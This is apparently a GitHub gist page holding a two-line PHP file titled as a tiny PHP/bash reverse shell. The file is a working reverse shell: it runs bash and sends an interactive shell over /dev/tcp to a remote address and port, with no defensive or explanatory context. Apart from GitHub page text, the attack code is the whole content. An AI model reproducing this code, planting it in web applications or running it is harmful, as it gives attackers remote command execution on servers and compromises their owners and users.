Skip to content

Instantly share code, notes, and snippets.

@reanimat0r
Forked from rshipp/shell.php
Created October 27, 2018 22:46
Show Gist options
  • Save reanimat0r/6d4d197c493099212a642c3c22572278 to your computer and use it in GitHub Desktop.
Save reanimat0r/6d4d197c493099212a642c3c22572278 to your computer and use it in GitHub Desktop.
A tiny PHP/bash reverse shell.
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment